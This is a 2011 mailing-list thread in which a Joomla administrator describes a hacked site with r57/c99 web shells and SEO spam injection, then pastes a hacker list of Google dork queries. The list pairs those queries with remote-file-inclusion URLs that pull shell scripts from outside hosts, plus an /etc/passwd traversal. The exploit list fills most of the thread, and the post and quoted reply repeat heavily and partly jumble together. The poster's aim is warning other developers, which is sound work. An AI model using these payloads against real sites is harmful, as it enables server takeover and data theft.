An interesting r57shell - c99shell exploit
632 views
Skip to first unread message
Rudy Preston
Feb 2, 2011, 1:24:58 PM2/2/11
to joomla-...@googlegroups.com, joomla-de...@googlegroups.com, joomla-dev...@googlegroups.com
Hi All
Had a joomla site on a shared server get hacked and a folder ended up in the public root called "mnt"
if you didn't know joomla, it would easily sit there in plain view.
Inside was a full package of tools for an r57shell and c99 shell setup:
http://www.scribd.com/doc/20337568/r57shell
http://www.scribd.com/doc/20337569/c99shell
With a neat little package of things that were then put into the code for the website using a module they created (not part of the install originally) called "com_ccboard"
It was found in the "modules" folder. It also has code in the configuration.php file and the index.php file of your template in the footer.
the config file code was used to redirect googlebots to pages on an external website but be indexed at the real site (ended up being 25,100 linked pages).
The template index code added a footer full of all the links they had indexed (position -1000, -1000 in the css)
The r57shell and c99shell contains a spam mailer setup that also allows them to create a database table, load a flat file of info into the table, create an object from the tabular data then delete the table. The flat file was filled with links back to a download site the fake index used.
This sent me on a google search to find out a few things. One of the first thing I found out is that google is a hacker's best friend.
But they also cache a page that needs a login for, so I was able to view hacker forum posts without having a login by viewing a search link
in google via the "cached" link on google search results.
Here is an example of what I found (if your component is on this list, hope u study the r57 and c99 scripts to see how they can take over a server from your component):
And, sad to say, this is just one of hundreds of lists like this. Please note that I did see that joomla 1.5.16 caused a lot of back doors to close, it made a big ripple in the forums.
STAY UP TO DATE
Google search:
inurl: "com_flyspray"
exploits:
/ Components / com_flyspray / startdown.php? File =../../../../../ etc / passwd% 00
exploits:
/ Index.php? _REQUEST = & _REQUEST [Option] = com_content & _REQUEST [Itemid] = 1
& GLOBALS = & mosConfig_absolute_path = http://site/sh3L/r57.jpg?cmd=id
Google search:
inurl: index.php? option = com_simpleboard
exploits:
/ Components / com_simpleboard / file_upload.php? SBP = http:///sh3L/r57.jpg?
Google search:
inurl: "com_hashcash"
exploits:
/ Components / com_hashcash / server.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_htmlarea3_xtd-c"
exploits:
/ Components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_sitemap"
exploits:
/ Components / com_sitemap / sitemap.xml.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_performs"
exploits:
/ Components / com_forum / download.php? Phpbb_root_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_pccookbook"
exploits:
components / com_pccookbook / pccookbook.php? mosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: index.php? option = com_extcalendar
exploits:
/ Components / com_extcalendar / extcalendar.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "minibb"
exploits:
components / minibb / index.php? absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_smf"
exploits:
/ Components / com_smf / smf.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
exploits:
/ Modules / mod_calendar.php? Absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_pollxt"
exploits:
/ Components / com_pollxt / conf.pollxt.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_loudmounth"
exploits:
/ Components / com_loudmounth / includes / abbc / abbc.class.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_videodb"
exploits:
/ Components / com_videodb / core / videodb.class.xml.php? MosConfig_absolute_path = http: / / site/sh3L/r57.jpg?
Google search:
inurl: index.php? option = com_pcchess
exploits:
/ Components / com_pcchess / include.pcchess.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_multibanners"
exploits:
/ Administrator / components / com_multibanners / extadminmenus.class.php? MosConfig_absolute_path = ht tp: / / site/sh3L/r57.jpg?
Google search:
inurl: "com_a6mambohelpdesk"
exploits:
/ Administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php? MosConfig_live_site = http: / / site/sh3L/r57.jpg?
Google search:
inurl: "com_colophon"
exploits:
/ Administrator / components / com_colophon / admin.colophon.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_mgm"
exploits:
administrator / components / com_mgm / help.mgm.php? mosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_mambatstaff"
exploits:
/ Components / com_mambatstaff / mambatstaff.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_securityimages"
exploits:
/ Components / com_securityimages / configinsert.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
exploits:
/ Components / com_securityimages / lang.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_artlinks"
exploits:
/ Components / com_artlinks / artlinks.dispnew.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_galleria"
exploits:
/ Components / com_galleria / galleria.html.php? MosConfig_absolute_path = http://site/lang/r57.jpg?
Google search:
inurl: index.php? option = com_simpleboard
/ Components / com_simpleboard / file_upload.php? SBP = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_hashcash"
CODE:
/ Components / com_hashcash / server.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_sitemap"
/ Components / com_sitemap / sitemap.xml.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_forum"
/ Components / com_forum / download.php? Phpbb_root_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: index.php? option = com_extcalendar
/ Components / com_extcalendar / extcalendar.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "minibb"
components / minibb / index.php? absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_pollxt"
/ Components / com_pollxt / conf.pollxt.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_loudmounth"
/ Components / com_loudmounth / includes / abbc / abbc.class.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_videodb"
/ Components / com_videodb / core / videodb.class.xml.php? MosConfig_absolute_path = http: / / hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: index.php? option = com_pcchess
/ Components / com_pcchess / include.pcchess.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_multibanners"
/ Administrator / components / com_multibanners / extadminmenus.class.php? MosConfig_absolute_path = ht tp: / / hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_a6mambohelpdesk"
/ Administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php? MosConfig_live_site = http: / / hitbaytar.kayyo.com/c99shell.txt?
Google search: "activity.php? page = Hof" or "Powered by phpBB" inurl: activity.php arabilirsiniz shaped ...
usage: http://hedef/script/language/lang_en...t.com/c99.txt?
Powered phpMyAgenda
Code:
agenda.php3? rootagenda = Shell
agenda2.php3? rootagenda = Shell
inurl: agenda.php3
Excerpt:
agenda.php3? rootagenda = Shell
Calling code: Xero Portal v1.2
[Exploit:
www. [target]. com / [script_pat] / admin / admin_linkdb.php? phpbb_root_path = http://evilscripts?
www. [target]. com / [script_pat] / admin / admin_forum_prune.php? phpbb_root_path = http://evilscripts? # www. [target]. com / [script_pat] / admin / admin_extensions.php? phpbb_root_path = http:/ / evilscripts?
www. [target]. com / [script_pat] / admin / admin_board.php? phpbb_root_path = http://evilscripts?
www. [target]. com / [script_pat] / admin / admin_attachments.php? phpbb_root_path = http://evilscripts?
www. [target]. com / [script_pat] / admin / admin_users.php? phpbb_root_path = http://evilscripts?
inurl: "fclick.php? fid"
show.php? path = http://muhacir.up.md/c99.txt?
show.php? path = http://muhacir.up.md/r57shell.txt?
Reed <= 0.3.1 (box.inc.php) Remote File Include Vulnerability
http:// [target] / [path] / sipss ... s] = [SHELL]
For example:
/ Sipssys / code / box.inc.php? Config [sipssys] = http:// [target] / [path] / shell.x
**--Rudy--**
ethos7.com
Phone: 480.382.5288
pathf...@ethos7.com
ru...@ethos7.com
joomlabamboo.com | joomla.org | ijoomla.com | xcloner.com | Site5 | ethos7
wordpress.org | elegantThemes | themeForest | rocketThemes | studioPress
Simplicity is the ultimate sophistication
-- Leonardo da Vinci
Had a joomla site on a shared server get hacked and a folder ended up in the public root called "mnt"
if you didn't know joomla, it would easily sit there in plain view.
Inside was a full package of tools for an r57shell and c99 shell setup:
http://www.scribd.com/doc/20337568/r57shell
http://www.scribd.com/doc/20337569/c99shell
With a neat little package of things that were then put into the code for the website using a module they created (not part of the install originally) called "com_ccboard"
It was found in the "modules" folder. It also has code in the configuration.php file and the index.php file of your template in the footer.
the config file code was used to redirect googlebots to pages on an external website but be indexed at the real site (ended up being 25,100 linked pages).
The template index code added a footer full of all the links they had indexed (position -1000, -1000 in the css)
The r57shell and c99shell contains a spam mailer setup that also allows them to create a database table, load a flat file of info into the table, create an object from the tabular data then delete the table. The flat file was filled with links back to a download site the fake index used.
This sent me on a google search to find out a few things. One of the first thing I found out is that google is a hacker's best friend.
But they also cache a page that needs a login for, so I was able to view hacker forum posts without having a login by viewing a search link
in google via the "cached" link on google search results.
Here is an example of what I found (if your component is on this list, hope u study the r57 and c99 scripts to see how they can take over a server from your component):
And, sad to say, this is just one of hundreds of lists like this. Please note that I did see that joomla 1.5.16 caused a lot of back doors to close, it made a big ripple in the forums.
STAY UP TO DATE
Google search:
inurl: "com_flyspray"
exploits:
/ Components / com_flyspray / startdown.php? File =../../../../../ etc / passwd% 00
exploits:
/ Index.php? _REQUEST = & _REQUEST [Option] = com_content & _REQUEST [Itemid] = 1
& GLOBALS = & mosConfig_absolute_path = http://site/sh3L/r57.jpg?cmd=id
Google search:
inurl: index.php? option = com_simpleboard
exploits:
/ Components / com_simpleboard / file_upload.php? SBP = http:///sh3L/r57.jpg?
Google search:
inurl: "com_hashcash"
exploits:
/ Components / com_hashcash / server.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_htmlarea3_xtd-c"
exploits:
/ Components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_sitemap"
exploits:
/ Components / com_sitemap / sitemap.xml.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_performs"
exploits:
/ Components / com_forum / download.php? Phpbb_root_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_pccookbook"
exploits:
components / com_pccookbook / pccookbook.php? mosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: index.php? option = com_extcalendar
exploits:
/ Components / com_extcalendar / extcalendar.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "minibb"
exploits:
components / minibb / index.php? absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_smf"
exploits:
/ Components / com_smf / smf.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
exploits:
/ Modules / mod_calendar.php? Absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_pollxt"
exploits:
/ Components / com_pollxt / conf.pollxt.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_loudmounth"
exploits:
/ Components / com_loudmounth / includes / abbc / abbc.class.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_videodb"
exploits:
/ Components / com_videodb / core / videodb.class.xml.php? MosConfig_absolute_path = http: / / site/sh3L/r57.jpg?
Google search:
inurl: index.php? option = com_pcchess
exploits:
/ Components / com_pcchess / include.pcchess.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_multibanners"
exploits:
/ Administrator / components / com_multibanners / extadminmenus.class.php? MosConfig_absolute_path = ht tp: / / site/sh3L/r57.jpg?
Google search:
inurl: "com_a6mambohelpdesk"
exploits:
/ Administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php? MosConfig_live_site = http: / / site/sh3L/r57.jpg?
Google search:
inurl: "com_colophon"
exploits:
/ Administrator / components / com_colophon / admin.colophon.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_mgm"
exploits:
administrator / components / com_mgm / help.mgm.php? mosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_mambatstaff"
exploits:
/ Components / com_mambatstaff / mambatstaff.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_securityimages"
exploits:
/ Components / com_securityimages / configinsert.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
exploits:
/ Components / com_securityimages / lang.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_artlinks"
exploits:
/ Components / com_artlinks / artlinks.dispnew.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_galleria"
exploits:
/ Components / com_galleria / galleria.html.php? MosConfig_absolute_path = http://site/lang/r57.jpg?
Google search:
inurl: index.php? option = com_simpleboard
/ Components / com_simpleboard / file_upload.php? SBP = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_hashcash"
CODE:
/ Components / com_hashcash / server.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_sitemap"
/ Components / com_sitemap / sitemap.xml.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_forum"
/ Components / com_forum / download.php? Phpbb_root_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: index.php? option = com_extcalendar
/ Components / com_extcalendar / extcalendar.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "minibb"
components / minibb / index.php? absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_pollxt"
/ Components / com_pollxt / conf.pollxt.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_loudmounth"
/ Components / com_loudmounth / includes / abbc / abbc.class.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_videodb"
/ Components / com_videodb / core / videodb.class.xml.php? MosConfig_absolute_path = http: / / hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: index.php? option = com_pcchess
/ Components / com_pcchess / include.pcchess.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_multibanners"
/ Administrator / components / com_multibanners / extadminmenus.class.php? MosConfig_absolute_path = ht tp: / / hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_a6mambohelpdesk"
/ Administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php? MosConfig_live_site = http: / / hitbaytar.kayyo.com/c99shell.txt?
Google search: "activity.php? page = Hof" or "Powered by phpBB" inurl: activity.php arabilirsiniz shaped ...
usage: http://hedef/script/language/lang_en...t.com/c99.txt?
Powered phpMyAgenda
Code:
agenda.php3? rootagenda = Shell
agenda2.php3? rootagenda = Shell
inurl: agenda.php3
Excerpt:
agenda.php3? rootagenda = Shell
Calling code: Xero Portal v1.2
[Exploit:
www. [target]. com / [script_pat] / admin / admin_linkdb.php? phpbb_root_path = http://evilscripts?
www. [target]. com / [script_pat] / admin / admin_forum_prune.php? phpbb_root_path = http://evilscripts? # www. [target]. com / [script_pat] / admin / admin_extensions.php? phpbb_root_path = http:/ / evilscripts?
www. [target]. com / [script_pat] / admin / admin_board.php? phpbb_root_path = http://evilscripts?
www. [target]. com / [script_pat] / admin / admin_attachments.php? phpbb_root_path = http://evilscripts?
www. [target]. com / [script_pat] / admin / admin_users.php? phpbb_root_path = http://evilscripts?
inurl: "fclick.php? fid"
show.php? path = http://muhacir.up.md/c99.txt?
show.php? path = http://muhacir.up.md/r57shell.txt?
Reed <= 0.3.1 (box.inc.php) Remote File Include Vulnerability
http:// [target] / [path] / sipss ... s] = [SHELL]
For example:
/ Sipssys / code / box.inc.php? Config [sipssys] = http:// [target] / [path] / shell.x
**--Rudy--**
ethos7.com
Phone: 480.382.5288
pathf...@ethos7.com
ru...@ethos7.com
joomlabamboo.com | joomla.org | ijoomla.com | xcloner.com | Site5 | ethos7
wordpress.org | elegantThemes | themeForest | rocketThemes | studioPress
Simplicity is the ultimate sophistication
-- Leonardo da Vinci
CedricWalter
Feb 2, 2011, 2:56:26 PM2/2/11
to Joomla! Framework Development
Hi all,
the only thing to do is to kill this exploit from running in the wild,
i did run a google query as well
allinurl:modules/com_ccboard
found 487'000 entries in google database, we should put everything in
a flat file ordered by unique hostname and send a mail to all these
administrator
Should Joomla! /a securitylist, not try to keep a database of all
administrator together with their sitename so we can easily warned
them if such an issue is detected?
Technically it could be done and be an added value to the
community....
On Feb 2, 1:24 pm, Rudy Preston <r...@ethos7.com> wrote:
> Hi All
>
> Had a joomla site on a shared server get hacked and a folder ended up in the
> public root called "mnt"
> if you didn't know joomla, it would easily sit there in plain view.
>
> Inside was a full package of tools for an r57shell and c99 shell setup:
>
> http://www.scribd.com/doc/20337568/r57shellhttp://www.scribd.com/doc/20337569/c99shell
> & GLOBALS = & mosConfig_absolute_path =http://site/sh3L/r57.jpg?cmd=id
> exploits:
> / Modules / mod_calendar.php? Absolute_path =http://site/sh3L/r57.jpg?
> exploits:
> / Components / com_securityimages / lang.php? MosConfig_absolute_path =http://site/sh3L/r57.jpg?
>
> Google search:
> inurl: "com_sitemap"
> / Components / com_sitemap / sitemap.xml.php? MosConfig_absolute_path =http://hitbaytar.kayyo.com/c99shell.txt?
>
> Google search:
> inurl: "com_forum"
>
> / Components / com_forum / download.php? Phpbb_root_path =http://hitbaytar.kayyo.com/c99shell.txt?
>
> Google search:
> inurl: "minibb"
>
> components / minibb / index.php? absolute_path =http://hitbaytar.kayyo.com/c99shell.txt?
>
> Google search:
> inurl: "com_pollxt"
>
> / Components / com_pollxt / conf.pollxt.php? MosConfig_absolute_path =http://hitbaytar.kayyo.com/c99shell.txt?
> show.php? path =http://muhacir.up.md/r57shell.txt?
> r...@ethos7.com
>
> joomlabamboo.com <http://www.joomlabamboo.com/673.html> | joomla.org |
> ijoomla.com <http://www.iJoomla.com/1195.html> |
> xcloner.com<http://www.xcloner.com/aff/idevaffiliate.php?id=1321>|
> Site5 <http://www.site5.com/in.php?id=98465> | ethos7 <http://ethos7.com>
>
> wordpress.org |
> elegantThemes<http://www.elegantthemes.com/affiliates/idevaffiliate.php?id=7251>|
> themeForest <http://themeforest.net?ref=buckmanhands> | rocketThemes |
> studioPress
>
> Simplicity is the ultimate sophistication*
> -- **Leonardo da Vinci*
the only thing to do is to kill this exploit from running in the wild,
i did run a google query as well
allinurl:modules/com_ccboard
found 487'000 entries in google database, we should put everything in
a flat file ordered by unique hostname and send a mail to all these
administrator
Should Joomla! /a securitylist, not try to keep a database of all
administrator together with their sitename so we can easily warned
them if such an issue is detected?
Technically it could be done and be an added value to the
community....
On Feb 2, 1:24 pm, Rudy Preston <r...@ethos7.com> wrote:
> Hi All
>
> Had a joomla site on a shared server get hacked and a folder ended up in the
> public root called "mnt"
> if you didn't know joomla, it would easily sit there in plain view.
>
> Inside was a full package of tools for an r57shell and c99 shell setup:
>
> Google search:
> inurl: index.php? option = com_simpleboard
>
> exploits:
> / Components / com_simpleboard / file_upload.php? SBP = http:///sh3L/r57.jpg?
>
> Google search:
> inurl: "com_hashcash"
>
> exploits:
> / Components / com_hashcash / server.php? MosConfig_absolute_path =http://site/sh3L/r57.jpg?
> inurl: index.php? option = com_simpleboard
>
> exploits:
> / Components / com_simpleboard / file_upload.php? SBP = http:///sh3L/r57.jpg?
>
> Google search:
> inurl: "com_hashcash"
>
> exploits:
> Google search:
> inurl: "com_htmlarea3_xtd-c"
>
> exploits:
> / Components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?
> MosConfig_absolute_path =http://site/sh3L/r57.jpg?
> inurl: "com_htmlarea3_xtd-c"
>
> exploits:
> / Components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?
> Google search:
> inurl: "com_sitemap"
>
> exploits:
> / Components / com_sitemap / sitemap.xml.php? MosConfig_absolute_path =http://site/sh3L/r57.jpg?
> inurl: "com_sitemap"
>
> exploits:
> Google search:
> inurl: "com_performs"
>
> exploits:
> / Components / com_forum / download.php? Phpbb_root_path =http://site/sh3L/r57.jpg?
> inurl: "com_performs"
>
> exploits:
> Google search:
> inurl: "com_pccookbook"
>
> exploits:
> components / com_pccookbook / pccookbook.php? mosConfig_absolute_path =http://site/sh3L/r57.jpg?
> inurl: "com_pccookbook"
>
> exploits:
> Google search:
> inurl: index.php? option = com_extcalendar
>
> exploits:
> / Components / com_extcalendar / extcalendar.php? MosConfig_absolute_path =http://site/sh3L/r57.jpg?
> inurl: index.php? option = com_extcalendar
>
> exploits:
> Google search:
> inurl: "minibb"
>
> exploits:
> components / minibb / index.php? absolute_path =http://site/sh3L/r57.jpg?
> inurl: "minibb"
>
> exploits:
> Google search:
> inurl: "com_smf"
>
> exploits:
> / Components / com_smf / smf.php? MosConfig_absolute_path =http://site/sh3L/r57.jpg?
> inurl: "com_smf"
>
> exploits:
> exploits:
> / Modules / mod_calendar.php? Absolute_path =http://site/sh3L/r57.jpg?
> Google search:
> inurl: "com_pollxt"
>
> exploits:
> / Components / com_pollxt / conf.pollxt.php? MosConfig_absolute_path =http://site/sh3L/r57.jpg?
> inurl: "com_pollxt"
>
> exploits:
> Google search:
> inurl: "com_loudmounth"
>
> exploits:
> / Components / com_loudmounth / includes / abbc / abbc.class.php?
> MosConfig_absolute_path =http://site/sh3L/r57.jpg?
> inurl: "com_loudmounth"
>
> exploits:
> / Components / com_loudmounth / includes / abbc / abbc.class.php?
> Google search:
> inurl: "com_videodb"
>
> exploits:
> / Components / com_videodb / core / videodb.class.xml.php?
> MosConfig_absolute_path = http: / / site/sh3L/r57.jpg?
> Google search:
> inurl: index.php? option = com_pcchess
>
> exploits:
> / Components / com_pcchess / include.pcchess.php? MosConfig_absolute_path =http://site/sh3L/r57.jpg?
> inurl: "com_videodb"
>
> exploits:
> / Components / com_videodb / core / videodb.class.xml.php?
> MosConfig_absolute_path = http: / / site/sh3L/r57.jpg?
> Google search:
> inurl: index.php? option = com_pcchess
>
> exploits:
> Google search:
> inurl: "com_multibanners"
>
> exploits:
> / Administrator / components / com_multibanners / extadminmenus.class.php?
> MosConfig_absolute_path = ht tp: / / site/sh3L/r57.jpg?
> Google search:
> inurl: "com_a6mambohelpdesk"
>
> exploits:
> / Administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?
> MosConfig_live_site = http: / / site/sh3L/r57.jpg?
> Google search:
> inurl: "com_colophon"
>
> exploits:
> / Administrator / components / com_colophon / admin.colophon.php?
> MosConfig_absolute_path =http://site/sh3L/r57.jpg?
> inurl: "com_multibanners"
>
> exploits:
> / Administrator / components / com_multibanners / extadminmenus.class.php?
> MosConfig_absolute_path = ht tp: / / site/sh3L/r57.jpg?
> Google search:
> inurl: "com_a6mambohelpdesk"
>
> exploits:
> / Administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?
> MosConfig_live_site = http: / / site/sh3L/r57.jpg?
> Google search:
> inurl: "com_colophon"
>
> exploits:
> / Administrator / components / com_colophon / admin.colophon.php?
> Google search:
> inurl: "com_mgm"
>
> exploits:
> administrator / components / com_mgm / help.mgm.php? mosConfig_absolute_path
> =http://site/sh3L/r57.jpg?
> inurl: "com_mgm"
>
> exploits:
> administrator / components / com_mgm / help.mgm.php? mosConfig_absolute_path
> Google search:
> inurl: "com_mambatstaff"
>
> exploits:
> / Components / com_mambatstaff / mambatstaff.php? MosConfig_absolute_path =http://site/sh3L/r57.jpg?
> inurl: "com_mambatstaff"
>
> exploits:
> Google search:
> inurl: "com_securityimages"
>
> exploits:
> / Components / com_securityimages / configinsert.php?
> MosConfig_absolute_path =http://site/sh3L/r57.jpg?
> inurl: "com_securityimages"
>
> exploits:
> / Components / com_securityimages / configinsert.php?
> exploits:
> / Components / com_securityimages / lang.php? MosConfig_absolute_path =http://site/sh3L/r57.jpg?
> Google search:
> inurl: "com_artlinks"
>
> exploits:
> / Components / com_artlinks / artlinks.dispnew.php? MosConfig_absolute_path
> =http://site/sh3L/r57.jpg?
> inurl: "com_artlinks"
>
> exploits:
> / Components / com_artlinks / artlinks.dispnew.php? MosConfig_absolute_path
> Google search:
> inurl: "com_galleria"
>
> exploits:
> / Components / com_galleria / galleria.html.php? MosConfig_absolute_path =http://site/lang/r57.jpg?
> inurl: "com_galleria"
>
> exploits:
>
> Google search:
>
> inurl: index.php? option = com_simpleboard
>
> / Components / com_simpleboard / file_upload.php? SBP =http://hitbaytar.kayyo.com/c99shell.txt?
> Google search:
>
> inurl: index.php? option = com_simpleboard
>
>
> Google search:
>
> inurl: "com_hashcash"
>
> CODE:
> / Components / com_hashcash / server.php? MosConfig_absolute_path =http://hitbaytar.kayyo.com/c99shell.txt?
> Google search:
>
> inurl: "com_hashcash"
>
> CODE:
>
> Google search:
> inurl: "com_sitemap"
> / Components / com_sitemap / sitemap.xml.php? MosConfig_absolute_path =http://hitbaytar.kayyo.com/c99shell.txt?
>
> Google search:
> inurl: "com_forum"
>
> / Components / com_forum / download.php? Phpbb_root_path =http://hitbaytar.kayyo.com/c99shell.txt?
>
> Google search:
> inurl: index.php? option = com_extcalendar
>
> / Components / com_extcalendar / extcalendar.php? MosConfig_absolute_path =http://hitbaytar.kayyo.com/c99shell.txt?
> Google search:
> inurl: index.php? option = com_extcalendar
>
>
> Google search:
> inurl: "minibb"
>
> components / minibb / index.php? absolute_path =http://hitbaytar.kayyo.com/c99shell.txt?
>
> Google search:
> inurl: "com_pollxt"
>
> / Components / com_pollxt / conf.pollxt.php? MosConfig_absolute_path =http://hitbaytar.kayyo.com/c99shell.txt?
>
> Google search:
> inurl: "com_loudmounth"
>
> / Components / com_loudmounth / includes / abbc / abbc.class.php?
> MosConfig_absolute_path =http://hitbaytar.kayyo.com/c99shell.txt?
> Google search:
> inurl: "com_loudmounth"
>
> / Components / com_loudmounth / includes / abbc / abbc.class.php?
>
> Google search:
> inurl: "com_videodb"
>
> / Components / com_videodb / core / videodb.class.xml.php?
> MosConfig_absolute_path = http: / / hitbaytar.kayyo.com/c99shell.txt?
>
> Google search:
> inurl: index.php? option = com_pcchess
>
> / Components / com_pcchess / include.pcchess.php? MosConfig_absolute_path =http://hitbaytar.kayyo.com/c99shell.txt?
> Google search:
> inurl: "com_videodb"
>
> / Components / com_videodb / core / videodb.class.xml.php?
> MosConfig_absolute_path = http: / / hitbaytar.kayyo.com/c99shell.txt?
>
> Google search:
> inurl: index.php? option = com_pcchess
>
>
> Google search:
> inurl: "com_multibanners"
>
> / Administrator / components / com_multibanners / extadminmenus.class.php?
> MosConfig_absolute_path = ht tp: / / hitbaytar.kayyo.com/c99shell.txt?
>
> Google search:
> inurl: "com_a6mambohelpdesk"
>
> / Administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?
> MosConfig_live_site = http: / / hitbaytar.kayyo.com/c99shell.txt?
>
> Google search: "activity.php? page = Hof" or "Powered by phpBB" inurl:
> activity.php arabilirsiniz shaped ...
>
> usage:http://hedef/script/language/lang_en...t.com/c99.txt?
>
> Powered phpMyAgenda
>
> Code:
>
> agenda.php3? rootagenda = Shell
>
> agenda2.php3? rootagenda = Shell
>
> inurl: agenda.php3
>
> Excerpt:
> agenda.php3? rootagenda = Shell
>
> Calling code: Xero Portal v1.2
>
> [Exploit:
> www. [target]. com / [script_pat] / admin / admin_linkdb.php?
> phpbb_root_path =http://evilscripts?
> Google search:
> inurl: "com_multibanners"
>
> / Administrator / components / com_multibanners / extadminmenus.class.php?
> MosConfig_absolute_path = ht tp: / / hitbaytar.kayyo.com/c99shell.txt?
>
> Google search:
> inurl: "com_a6mambohelpdesk"
>
> / Administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?
> MosConfig_live_site = http: / / hitbaytar.kayyo.com/c99shell.txt?
>
> Google search: "activity.php? page = Hof" or "Powered by phpBB" inurl:
> activity.php arabilirsiniz shaped ...
>
> usage:http://hedef/script/language/lang_en...t.com/c99.txt?
>
> Powered phpMyAgenda
>
> Code:
>
> agenda.php3? rootagenda = Shell
>
> agenda2.php3? rootagenda = Shell
>
> inurl: agenda.php3
>
> Excerpt:
> agenda.php3? rootagenda = Shell
>
> Calling code: Xero Portal v1.2
>
> [Exploit:
> www. [target]. com / [script_pat] / admin / admin_linkdb.php?
> www. [target]. com / [script_pat] / admin / admin_forum_prune.php?
> phpbb_root_path =http://evilscripts?# www. [target]. com / [script_pat] /
> admin / admin_extensions.php? phpbb_root_path = http:/ / evilscripts?
> www. [target]. com / [script_pat] / admin / admin_board.php? phpbb_root_path
> =http://evilscripts?
> www. [target]. com / [script_pat] / admin / admin_board.php? phpbb_root_path
> www. [target]. com / [script_pat] / admin / admin_attachments.php?
> phpbb_root_path =http://evilscripts?
> www. [target]. com / [script_pat] / admin / admin_users.php? phpbb_root_path
> =http://evilscripts?
> show.php? path =http://muhacir.up.md/r57shell.txt?
>
> Reed <= 0.3.1 (box.inc.php) Remote File Include Vulnerability
>
> http:// [target] / [path] / sipss ... s] = [SHELL]
>
> For example:
>
> / Sipssys / code / box.inc.php? Config [sipssys] = http:// [target] / [path]
> / shell.x
>
> **--Rudy--**
> ethos7.com
>
> Phone: 480.382.5288
> pathfin...@ethos7.com
> Reed <= 0.3.1 (box.inc.php) Remote File Include Vulnerability
>
> http:// [target] / [path] / sipss ... s] = [SHELL]
>
